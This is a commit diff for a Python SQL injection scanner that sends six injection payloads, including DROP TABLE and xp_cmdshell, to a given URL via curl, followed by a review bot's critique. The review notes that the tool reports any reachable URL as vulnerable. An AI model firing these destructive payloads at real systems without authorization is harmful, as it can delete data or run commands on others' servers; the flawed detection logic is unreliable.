deveshpunjabi commited on
Commit
524f6b0
Β·
verified Β·
1 Parent(s): 18fdeb9

Update sql_injection/sql_injection.py

  1. sql_injection/sql_injection.py +47 -23
sql_injection/sql_injection.py CHANGED
@@ -1,54 +1,78 @@
1
  import subprocess
2
  import urllib.parse
 
 
3
 
4
  def run_sqlmap(url: str):
5
  """
6
- Test for SQL Injection vulnerabilities with user-friendly results.
7
  Args:
8
  url (str): The URL to test.
9
  Returns:
10
- tuple: Test results as HTML and the path to the results file.
11
  """
12
  try:
13
  url = url.strip()
14
  if not url.startswith(('http://', 'https://')):
15
- return "<h3 style='color: red;'>❌ Invalid URL: Must start with http:// or https://</h3>", None
16
 
17
  payloads = [
18
  ("' OR '1'='1 --", "Bypass login with always-true condition."),
19
- ("' UNION SELECT null, username, password FROM users --", "Extract usernames and passwords."),
20
- ("'; DROP TABLE users; --", "Delete a users table (destructive)."),
21
- ("' OR 'a'='a", "Simple OR condition."),
22
- ("'; EXEC xp_cmdshell('dir') --", "Execute server-side commands (if enabled)."),
23
- ("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Reveal database version and user.")
24
  ]
25
 
26
- results_html = "<h2>SQL Injection Test Results</h2>"
27
- for payload, description in payloads:
 
28
  encoded_payload = urllib.parse.quote(payload)
29
  full_url = f"{url}?id={encoded_payload}"
30
  command = ['curl', '-X', 'GET', full_url]
31
-
32
  result = subprocess.run(command, capture_output=True, text=True)
33
- status_icon = "βœ…" if result.returncode == 0 else "❌"
34
 
35
- results_html += f"""
36
- <div style='border: 1px solid #ccc; padding: 10px; margin: 10px 0;'>
37
- <h3>{status_icon} Payload: {payload}</h3>
38
- <p><strong>Purpose:</strong> {description}</p>
39
- <pre>{result.stdout if result.returncode == 0 else result.stderr}</pre>
40
- </div>
41
- """
 
 
42
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
43
  output_file = "./sql_injection_result.html"
44
  with open(output_file, "w") as file:
45
- file.write(results_html)
46
 
47
- return results_html, output_file
48
 
49
  except Exception as e:
50
- error_message = f"<h3 style='color: red;'>❌ Error running SQL Injection test: {str(e)}</h3>"
51
- error_file = "./sql_injection_error.html"
52
  with open(error_file, "w") as file:
53
  file.write(error_message)
54
  return error_message, error_file
 
1
  import subprocess
2
  import urllib.parse
3
+ import os
4
+
5
 
6
  def run_sqlmap(url: str):
7
  """
8
+ Test for SQL Injection vulnerabilities and provide explanations.
9
  Args:
10
  url (str): The URL to test.
11
  Returns:
12
+ tuple: Test results as a string and the path to the results file.
13
  """
14
  try:
15
  url = url.strip()
16
  if not url.startswith(('http://', 'https://')):
17
+ return "Invalid URL: Must start with http:// or https://", None
18
 
19
  payloads = [
20
  ("' OR '1'='1 --", "Bypass login with always-true condition."),
21
+ ("' UNION SELECT null, username, password FROM users --", "Extract user credentials via UNION SELECT."),
22
+ ("'; DROP TABLE users; --", "Attempt to delete the users table."),
23
+ ("' OR 'a'='a", "Bypass login with simple true condition."),
24
+ ("'; EXEC xp_cmdshell('dir') --", "Execute system command on the server."),
25
+ ("' AND 1=0 UNION ALL SELECT NULL, version(), current_user --", "Retrieve DB version and current user."),
26
  ]
27
 
28
+ results = ""
29
+
30
+ for payload, purpose in payloads:
31
  encoded_payload = urllib.parse.quote(payload)
32
  full_url = f"{url}?id={encoded_payload}"
33
  command = ['curl', '-X', 'GET', full_url]
34
+
35
  result = subprocess.run(command, capture_output=True, text=True)
 
36
 
37
+ success = "βœ…" if result.returncode == 0 and "login" not in result.stdout.lower() else "❌"
38
+
39
+ results += f"{success} Payload: {payload}\n"
40
+ results += f"Purpose: {purpose}\n"
41
+
42
+ if success == "βœ…":
43
+ results += "Result: Potential vulnerability detected!\n"
44
+ else:
45
+ results += "Result: No vulnerability detected for this payload.\n"
46
 
47
+ results += "\nResponse Preview:\n" + result.stdout[:200] + "...\n\n"
48
+
49
+ # Explain the issue and potential fixes
50
+ if success == "βœ…":
51
+ results += "Explanation: The server responded positively to the payload, suggesting a possible vulnerability.\n"
52
+ if "1'='1" in payload:
53
+ results += "Issue: SQL injection allows login bypass.\n"
54
+ results += "Fix: Use prepared statements or ORM libraries to prevent SQL injection. Validate and sanitize user inputs.\n"
55
+ elif "DROP TABLE" in payload:
56
+ results += "Issue: SQL injection can delete critical tables.\n"
57
+ results += "Fix: Apply strict database permissions and input filtering.\n"
58
+ elif "xp_cmdshell" in payload:
59
+ results += "Issue: Remote code execution.\n"
60
+ results += "Fix: Disable dangerous SQL functions and limit server privileges.\n"
61
+ else:
62
+ results += "Issue: Data leakage or server exploitation.\n"
63
+ results += "Fix: Use Web Application Firewalls (WAFs) and keep software up to date.\n"
64
+ results += "\n"
65
+
66
+ # Save results to a file
67
  output_file = "./sql_injection_result.html"
68
  with open(output_file, "w") as file:
69
+ file.write(f"<html><body><pre>{results}</pre></body></html>")
70
 
71
+ return results, output_file
72
 
73
  except Exception as e:
74
+ error_message = f"Error running SQL Injection test: {str(e)}"
75
+ error_file = "./sql_injection_error.txt"
76
  with open(error_file, "w") as file:
77
  file.write(error_message)
78
  return error_message, error_file
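Review bot: The classification at new line 37, `success = "βœ…" if result.returncode == 0 and "login" not in result.stdout.lower() else "❌"`, uses curl's exit status as the signal, but a return code of 0 only means the HTTP request completed, so every reachable URL is reported as "Potential vulnerability detected!" regardless of how the server handled the parameter; the report should say what is actually being compared (e.g. a baseline response versus the payload response) or, at minimum, a comment such as `# NOTE: returncode 0 only proves the request completed; this is a reachability check, not evidence of injection` above the line. The write at new line 69 embeds `results`, which contains the raw `result.stdout[:200]` from the target, into an HTML file without escaping, so a response containing markup lands verbatim in the report; `file.write(f"<html><body><pre>{html.escape(results)}</pre></body></html>")` with `import html` added alongside the imports fixes that. The `subprocess.run(...)` call at new line 35 has no `timeout=`, so an unresponsive target blocks the whole run; `subprocess.run(command, capture_output=True, text=True, timeout=30)` would bound it and the existing `except Exception` already covers the resulting `TimeoutExpired`. The `import os` added at new line 3 is not used anywhere in the new side.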